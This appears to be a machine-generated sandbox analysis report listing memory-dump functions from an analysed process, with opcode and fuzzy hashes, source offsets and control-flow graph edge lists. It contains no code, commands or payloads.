                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2
                                            • API String ID: 0-450215437
                                            • Opcode ID: a35bf82ab83bdb7de888424809a5e64c0b80a1f2c81deb9a6dbe3e8d0be3e618
                                            • Instruction ID: 53305101114947d7c5c5923c6f59454898ee7c650c7e8b5bace595c051db5636
                                            • Opcode Fuzzy Hash: a35bf82ab83bdb7de888424809a5e64c0b80a1f2c81deb9a6dbe3e8d0be3e618
                                            • Instruction Fuzzy Hash: 3632BDB0E1991D8FDBA8EB58C8A5AB9B7B1FF58300F5041AAD00DD7295DA356E81CF40
                                            Function 00007FFD9B8C26FE Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8c2000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 1709ff631bfff015e3b89e9defdf44e85995f6e79848a77b8ee89ce4468f1f79
                                            • Instruction ID: 95ce3c37bd54aa85cf86009b909b8392f2e31cec4b52844cc578ca1229cf6dae
                                            • Opcode Fuzzy Hash: 1709ff631bfff015e3b89e9defdf44e85995f6e79848a77b8ee89ce4468f1f79
                                            • Instruction Fuzzy Hash: 58516D74D0864D8FDB58DFA8C885AE9BBF1FF5A310F1042AAD449E3251DB74A885CB40
                                            Function 00007FFD9B8C40ED Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 104 7ffd9b8c40ed-7ffd9b8c4223 VirtualAlloc 109 7ffd9b8c4225 104->109 110 7ffd9b8c422b-7ffd9b8c428f 104->110 109->110
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8c2000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 0f79a13b8c81ed6782b5f1870571a1ac84b2fd3484139ed94f0426bbe69a87ea
                                            • Instruction ID: c1379373fe7e44c9c6c75da23e6bf99ed063364f0d4d668c77100fd9bb0fe4ce
                                            • Opcode Fuzzy Hash: 0f79a13b8c81ed6782b5f1870571a1ac84b2fd3484139ed94f0426bbe69a87ea
                                            • Instruction Fuzzy Hash: D6514B70908A5D8FDF94EF68D845BE9BBF1FB69310F1041AAD04DE3255DB70A9858F80
                                            Function 00007FFD9B8BC4B6 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 113 7ffd9b8bc4b6-7ffd9b8bc4ca 114 7ffd9b8bc4d4-7ffd9b8bc517 113->114
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >
                                            • API String ID: 0-325317158
                                            • Opcode ID: 6bc67f4a226e8bbd3c4dc4bd85d8488da0f774ae3399aca52f6ca3e1f51a1f7c
                                            • Instruction ID: f6226952d50f41d37c2b543db537a6c13b651fe31493a70e1545d16312cbadaf
                                            • Opcode Fuzzy Hash: 6bc67f4a226e8bbd3c4dc4bd85d8488da0f774ae3399aca52f6ca3e1f51a1f7c
                                            • Instruction Fuzzy Hash: 2DF0B770D0912E8FEB609FA4C8687B9B6B0EB18304F1141F5D01EA2291CB786BC5CF51
                                            Function 00007FFD9B8C02E9 Relevance: .7, Instructions: 736COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 116 7ffd9b8c02e9-7ffd9b8c038e 121 7ffd9b8c03e7-7ffd9b8c03ed 116->121 122 7ffd9b8c0390-7ffd9b8c03e4 121->122 123 7ffd9b8c03ef-7ffd9b8c0452 call 7ffd9b8c0e0a 121->123 122->121 133 7ffd9b8c0deb-7ffd9b8c0df8 123->133 134 7ffd9b8c0457-7ffd9b8c0466 133->134 135 7ffd9b8c0dfe-7ffd9b8c0e09 133->135 136 7ffd9b8c0468 134->136 137 7ffd9b8c046d-7ffd9b8c05d7 134->137 136->137 149 7ffd9b8c064b-7ffd9b8c06eb 137->149 150 7ffd9b8c05d9-7ffd9b8c0646 137->150 159 7ffd9b8c075c-7ffd9b8c07a4 149->159 160 7ffd9b8c06ed-7ffd9b8c075a 149->160 157 7ffd9b8c0de3-7ffd9b8c0de8 150->157 157->133 166 7ffd9b8c07af-7ffd9b8c07b5 159->166 160->166 167 7ffd9b8c0837-7ffd9b8c0844 166->167 168 7ffd9b8c07ba-7ffd9b8c07e1 167->168 169 7ffd9b8c084a-7ffd9b8c08fc 167->169 170 7ffd9b8c07e8-7ffd9b8c0834 168->170 171 7ffd9b8c07e3 168->171 178 7ffd9b8c0b79-7ffd9b8c0b7f 169->178 170->167 171->170 179 7ffd9b8c0b85-7ffd9b8c0b98 178->179 180 7ffd9b8c0901-7ffd9b8c0905 178->180 181 7ffd9b8c0b99-7ffd9b8c0ba3 179->181 182 7ffd9b8c0907-7ffd9b8c091e 180->182 183 7ffd9b8c0922-7ffd9b8c0b23 180->183 187 7ffd9b8c0ba8-7ffd9b8c0bb0 181->187 182->183 188 7ffd9b8c0b26-7ffd9b8c0b28 183->188 192 7ffd9b8c0c21 187->192 193 7ffd9b8c0bb1-7ffd9b8c0bb4 187->193 188->181 189 7ffd9b8c0b2a-7ffd9b8c0b2c 188->189 189->187 191 7ffd9b8c0b2e 189->191 196 7ffd9b8c0ab5 191->196 197 7ffd9b8c0b30 191->197 194 7ffd9b8c0c1f 192->194 195 7ffd9b8c0c22-7ffd9b8c0c2a 192->195 198 7ffd9b8c0bb6 193->198 199 7ffd9b8c0c30-7ffd9b8c0c35 193->199 194->192 195->199 196->188 200 7ffd9b8c0ab7-7ffd9b8c0ab9 196->200 201 7ffd9b8c0b35 197->201 203 7ffd9b8c0bb7-7ffd9b8c0bbd 198->203 204 7ffd9b8c0b3d 198->204 202 7ffd9b8c0c39-7ffd9b8c0c3d 199->202 200->201 205 7ffd9b8c0abb 200->205 201->193 206 7ffd9b8c0b37-7ffd9b8c0b3b 201->206 207 7ffd9b8c0c3f-7ffd9b8c0c41 202->207 203->202 221 7ffd9b8c0bbf-7ffd9b8c0bc3 203->221 208 7ffd9b8c0b3f 204->208 209 7ffd9b8c0ac4 204->209 210 7ffd9b8c0abd 205->210 211 7ffd9b8c0a42-7ffd9b8c0a44 205->211 206->203 206->204 212 7ffd9b8c0cbd 207->212 213 7ffd9b8c0c42 207->213 216 7ffd9b8c0b44-7ffd9b8c0b6b 208->216 215 7ffd9b8c0ac5-7ffd9b8c0ac8 209->215 210->209 211->215 217 7ffd9b8c0a46 211->217 218 7ffd9b8c0cc2-7ffd9b8c0ccb 212->218 219 7ffd9b8c0cb3-7ffd9b8c0cb7 213->219 220 7ffd9b8c0c43-7ffd9b8c0c46 213->220 215->216 222 7ffd9b8c0aca 215->222 229 7ffd9b8c0b71-7ffd9b8c0b76 216->229 223 7ffd9b8c0a51-7ffd9b8c0a53 217->223 224 7ffd9b8c0d3c-7ffd9b8c0d4c 218->224 225 7ffd9b8c0ccd 218->225 219->212 220->218 226 7ffd9b8c0c48 220->226 221->207 227 7ffd9b8c0bc5-7ffd9b8c0bc8 221->227 222->223 228 7ffd9b8c0acc 222->228 230 7ffd9b8c0a55 223->230 231 7ffd9b8c0ad4-7ffd9b8c0afb 223->231 233 7ffd9b8c0d4e-7ffd9b8c0d50 224->233 234 7ffd9b8c0dbd-7ffd9b8c0dcb 224->234 232 7ffd9b8c0d06 225->232 235 7ffd9b8c0c4a 226->235 236 7ffd9b8c0bcf-7ffd9b8c0c15 226->236 227->236 228->231 229->178 230->196 231->229 232->224 238 7ffd9b8c0dcc-7ffd9b8c0de1 233->238 239 7ffd9b8c0d52-7ffd9b8c0d55 233->239 234->238 240 7ffd9b8c0c6a-7ffd9b8c0c95 235->240 236->240 244 7ffd9b8c0c17-7ffd9b8c0c1e 236->244 238->157 239->234 240->232 247 7ffd9b8c0c97-7ffd9b8c0c9b 240->247 244->194 247->195 250 7ffd9b8c0c9d 247->250 250->219
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b32c7645f7ac7c68ce72f12ab66c91f5cbeea371f59312049ed9b582ac0b896
                                            • Instruction ID: 1bebe49bd21d46c78043f14429d6a428bfad31bb4fd204ec1be2ea2f6ba1eca2
                                            • Opcode Fuzzy Hash: 6b32c7645f7ac7c68ce72f12ab66c91f5cbeea371f59312049ed9b582ac0b896
                                            • Instruction Fuzzy Hash: CB52CC70A1961D8FDBA9EB58C895BA8B7B1FF58701F1101EAD00DD72A1DB35AE81CF40
                                            Function 00007FFD9B8F93CD Relevance: .4, Instructions: 416COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87c8a689ab33de623c33b0e59644be751f5379f89441381972aa312ff124f032
                                            • Instruction ID: 72e74f0f6574e59259ca450c7aa69ffa9cded7b480f6f6e8332c5c5da8febbfa
                                            • Opcode Fuzzy Hash: 87c8a689ab33de623c33b0e59644be751f5379f89441381972aa312ff124f032
                                            • Instruction Fuzzy Hash: 04F12E71E1965D8FDBACDF58C8A57A8BBE1FF58300F4445BAD00DD32A2DA34A981CB41
                                            Function 00007FFD9B902A2F Relevance: .3, Instructions: 289COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 381 7ffd9b902a2f-7ffd9b902a41 383 7ffd9b902a43-7ffd9b902a46 381->383 384 7ffd9b902a5d-7ffd9b902c4f 381->384 386 7ffd9b902a4b-7ffd9b902a5c 383->386 387 7ffd9b902a48 383->387 391 7ffd9b902c56-7ffd9b902c6e 384->391 392 7ffd9b902c51 384->392 386->384 387->386 393 7ffd9b902c74-7ffd9b902c81 391->393 392->391
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c6f636282fc4a6d1400aeaf8511cc80134cfd77c6e74a36fa7e027be392c828
                                            • Instruction ID: 5cd8d933ec2451d8da786ea61ad538316278ea8b34632d39df1858092691af55
                                            • Opcode Fuzzy Hash: 4c6f636282fc4a6d1400aeaf8511cc80134cfd77c6e74a36fa7e027be392c828
                                            • Instruction Fuzzy Hash: 6C21D035A0955E8FDB55EFA898689E93BA0FFA5315F1500BBD049C30E2DA349989C780
                                            Function 00007FFD9B8B0A19 Relevance: .3, Instructions: 281COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8619930eb3f95d8394afca25aee2707b824fa7c6a00c4db15ba6e977d34804b9
                                            • Instruction ID: e040fa56567607f2f5236a2becd4c564d46d5b2df6dcf1f17a70f40987eba188
                                            • Opcode Fuzzy Hash: 8619930eb3f95d8394afca25aee2707b824fa7c6a00c4db15ba6e977d34804b9
                                            • Instruction Fuzzy Hash: AF715711F2EA5E0AF3685ABD08652B976C2DF89B11F26023ED4DFC32E7DC1C69034681
                                            Function 00007FFD9B8B1AFD Relevance: .3, Instructions: 271COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 443 7ffd9b8b1afd-7ffd9b8b1b49 447 7ffd9b8b1b4b 443->447 448 7ffd9b8b1b50-7ffd9b8b1d33 call 7ffd9b8b0838 443->448 447->448 474 7ffd9b8b1d3b-7ffd9b8b1dbc 448->474 477 7ffd9b8b1dc5-7ffd9b8b1e2c 474->477 478 7ffd9b8b1dbe-7ffd9b8b1dc4 474->478 478->477
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e9bdd977e29065ca911abf6d89e4a8b6fbecee58a56dc8484e7708b566287608
                                            • Instruction ID: ab7638437ac37762999c0584785941ca69fb073c0d7a7df5056c146526beef07
                                            • Opcode Fuzzy Hash: e9bdd977e29065ca911abf6d89e4a8b6fbecee58a56dc8484e7708b566287608
                                            • Instruction Fuzzy Hash: 1AA1D071A18A8D8FEB98DB6CD8657F87BE1FF58300F44017ED009D72A6DB7828018B81
                                            Function 00007FFD9B8B0868 Relevance: .2, Instructions: 169COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8db5a76319a21c6dc69b6fefa43e649efd456f0a39edb8ff937745b876b49486
                                            • Instruction ID: ceb9ee03aa9ad0db12d70b2b17fe7dfe8eae9f850ba5ea365e0f1ab817912f6a
                                            • Opcode Fuzzy Hash: 8db5a76319a21c6dc69b6fefa43e649efd456f0a39edb8ff937745b876b49486
                                            • Instruction Fuzzy Hash: A2412931B1DA688FD764DB7C88556B97BE1FF5D301B05417EE09EC72A2DE24E8018B81
                                            Function 00007FFD9B8F95AA Relevance: .2, Instructions: 169COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f87b38a5c1d8fdb2a5d5ac5cb8173ff28873036b787e5f0b7208816746aafc51
                                            • Instruction ID: d4908ea12c5989c550a3eab42bfdf29793cc42656711ac4729f994968470e24b
                                            • Opcode Fuzzy Hash: f87b38a5c1d8fdb2a5d5ac5cb8173ff28873036b787e5f0b7208816746aafc51
                                            • Instruction Fuzzy Hash: 0751DA70A19A5D8FDFA8EF58C8A5BB8B7E2FF58300F5040A9D01DD7296DA35A941CB40
                                            Function 00007FFD9B8FF7BE Relevance: .2, Instructions: 157COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 90d93c194128ef968345bf7fe689582d7909909f1220f9a86f338409d9e7165d
                                            • Instruction ID: a9bfd90bf4709bf77ee371314a6a9a6898a74f8e535a3c27ab3c1ca69f56b2ce
                                            • Opcode Fuzzy Hash: 90d93c194128ef968345bf7fe689582d7909909f1220f9a86f338409d9e7165d
                                            • Instruction Fuzzy Hash: D7519470E15A1D8FDB94EF98C895BADBBF1FB58301F2082AAD40DE3255DB346985CB40
                                            Function 00007FFD9B8CC44C Relevance: .1, Instructions: 146COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ae603c46c8ffde8e50d27e8c7776caa8dec84f2fa5f3cafb2b2fb8f9145cb26
                                            • Instruction ID: 5febc6d04df1eae36e0cf46e993d74b0bea7df47fc0c7dc8fabcc10876985b5d
                                            • Opcode Fuzzy Hash: 3ae603c46c8ffde8e50d27e8c7776caa8dec84f2fa5f3cafb2b2fb8f9145cb26
                                            • Instruction Fuzzy Hash: 8551A070E0951D8FDBA8EB58C8A5AB9B7B1FF58300F5081AAD00DD7255DE35AD81CF80
                                            Function 00007FFD9B8CC472 Relevance: .1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d5ef1af99148f37bb5293ef8428481a73fa6990506801877ef0871dfd7b01da
                                            • Instruction ID: 3e303f951e1db55a179a69814b033e7607936a91b2999549f7b45c00471193fa
                                            • Opcode Fuzzy Hash: 4d5ef1af99148f37bb5293ef8428481a73fa6990506801877ef0871dfd7b01da
                                            • Instruction Fuzzy Hash: 5E519170E1951D8FDBA8EB58C895AB9B7B1FF58300F5082EAD00DD7255DA35AD81CF80
                                            Function 00007FFD9B8CC496 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f120254a5eb43dc310842e5cdd3d220cfeb466e280c89e2f3ceef832d55e280
                                            • Instruction ID: 5e7bcfed38c66f76730d3158de8cbbefa4bf6f2ab082b1de178002a46d51c53f
                                            • Opcode Fuzzy Hash: 4f120254a5eb43dc310842e5cdd3d220cfeb466e280c89e2f3ceef832d55e280
                                            • Instruction Fuzzy Hash: 6551AF71E0991D8FDBA8EB58C895ABDB7B1FB58300F5082AAD00DD7255DA35AD81CF80
                                            Function 00007FFD9B8CC0CB Relevance: .1, Instructions: 125COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 57f9d56179324f9cbd1ce7515c5225462d1d0eb6591da024980180bde6b8e5a0
                                            • Instruction ID: 62eec895bf5e2d4c9444f877764d1add2750b3a1e1bb79f3996270d1fc290f8e
                                            • Opcode Fuzzy Hash: 57f9d56179324f9cbd1ce7515c5225462d1d0eb6591da024980180bde6b8e5a0
                                            • Instruction Fuzzy Hash: CD41C271A1991D8FDB98EB58C895AB9B7B1FF98300F5042EAD00DD3195DE35AD818F80
                                            Function 00007FFD9B8CC395 Relevance: .1, Instructions: 124COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed1dfa0f70a2b77cf03161dd18097bb720772694ddaada2aa6d894b1341ca07c
                                            • Instruction ID: db18c46b0c097c674a040a8b78b01db2e20e208e9261d524da04147077a90b4a
                                            • Opcode Fuzzy Hash: ed1dfa0f70a2b77cf03161dd18097bb720772694ddaada2aa6d894b1341ca07c
                                            • Instruction Fuzzy Hash: A141C170A1991D8FDBA8EB58D895AB9B3B1FF98300F1082EAD04DD3155DE35AD85CF80
                                            Function 00007FFD9B8CC348 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c021b68ac014e85750d13655d36315d2203ef7430e13350db2fd75ea35c0ba72
                                            • Instruction ID: e816ae8a9ff00aee1a0af1ad439467718b48b5d196171cf7fa3894c48b1d1133
                                            • Opcode Fuzzy Hash: c021b68ac014e85750d13655d36315d2203ef7430e13350db2fd75ea35c0ba72
                                            • Instruction Fuzzy Hash: 36419270E1995D8FDB98EB58C895BA9B7B1FB58300F5082EAD00DD3255DE35AE81CF80
                                            Function 00007FFD9B8CC2C2 Relevance: .1, Instructions: 109COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0b7568f1e88d233019f3daad5cc2ed9acebc7008850cc49be866752c154c6e1
                                            • Instruction ID: 26adbb5c90e1d88f7001acafd6c5ed9d916d92b1cc51bea69b62b1f24f2c5264
                                            • Opcode Fuzzy Hash: e0b7568f1e88d233019f3daad5cc2ed9acebc7008850cc49be866752c154c6e1
                                            • Instruction Fuzzy Hash: 5E419270E1995D8FDB98EB58C895BA9B7B1FB58300F5082EAD00DD3255DE35AE81CF80
                                            Function 00007FFD9B8B5073 Relevance: .1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f17725c485865f29da66896d42260d8073caa15f78cc009fc15d8acc9bd251c1
                                            • Instruction ID: 9e337bbcee65172a5069ea091df76a4aff1cee08d73c90134d246def1de4223d
                                            • Opcode Fuzzy Hash: f17725c485865f29da66896d42260d8073caa15f78cc009fc15d8acc9bd251c1
                                            • Instruction Fuzzy Hash: 0041BB74A1852D8FDFA4EF14C864BEDB7B1EB58309F1001EA900EE32A5DB755A858F41
                                            Function 00007FFD9B8CC3EE Relevance: .1, Instructions: 103COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c5bcd82adf9447b570e2ec2b04fb2a5df6143e8a9e2dc0edc11d6307c602de02
                                            • Instruction ID: 05f74da77a23ae25bc7298c67ecaefbc3d942c9bff7b6d3ff7052b9d569cfa08
                                            • Opcode Fuzzy Hash: c5bcd82adf9447b570e2ec2b04fb2a5df6143e8a9e2dc0edc11d6307c602de02
                                            • Instruction Fuzzy Hash: 7D41E370E1991D8FDB98EB58C895AA9B7B1FF58300F5082EAD04DD3165DE35AD82CF80
                                            Function 00007FFD9B8CC3FB Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c1f7a0c8a2bf8af0f3f6fdbc28b456b24ce75354c993636dac5ec43425c6d43c
                                            • Instruction ID: 1967c61016598064b76bfab6e2e13d30ebf91064dd57d334946d3d81394ef7cb
                                            • Opcode Fuzzy Hash: c1f7a0c8a2bf8af0f3f6fdbc28b456b24ce75354c993636dac5ec43425c6d43c
                                            • Instruction Fuzzy Hash: 8F318070E1991D8FDB98EB58C895BA9B7B1FB58300F5082EAD04DD3265DE35AD81CF80
                                            Function 00007FFD9B8B0838 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20961de1ef3cee2a2098d67f4ce61b789aef0496ff5fb0bf737c8979901a3502
                                            • Instruction ID: b2f504ec3972b800ea471497cfa55808200631285f77482752d2ab32b7060adf
                                            • Opcode Fuzzy Hash: 20961de1ef3cee2a2098d67f4ce61b789aef0496ff5fb0bf737c8979901a3502
                                            • Instruction Fuzzy Hash: E1213D32A1D3A84ED725A77C685A4FA3FE0EF4A229B04027FE4D9C6193DE24914687D1
                                            Function 00007FFD9B8B1575 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96d2cab12d1ffe578018975ca043720028c21b2bddb4f5caf237e70d3f0caeda
                                            • Instruction ID: 2b34c06446f0de9ff6b9138545d308d6671e8456d65fc734d42047e0e828e01a
                                            • Opcode Fuzzy Hash: 96d2cab12d1ffe578018975ca043720028c21b2bddb4f5caf237e70d3f0caeda
                                            • Instruction Fuzzy Hash: 8D313431B1D6AE8FD712BBB8CC216E9B7B0EF46310F054177C025CB1D2DA3866068B92
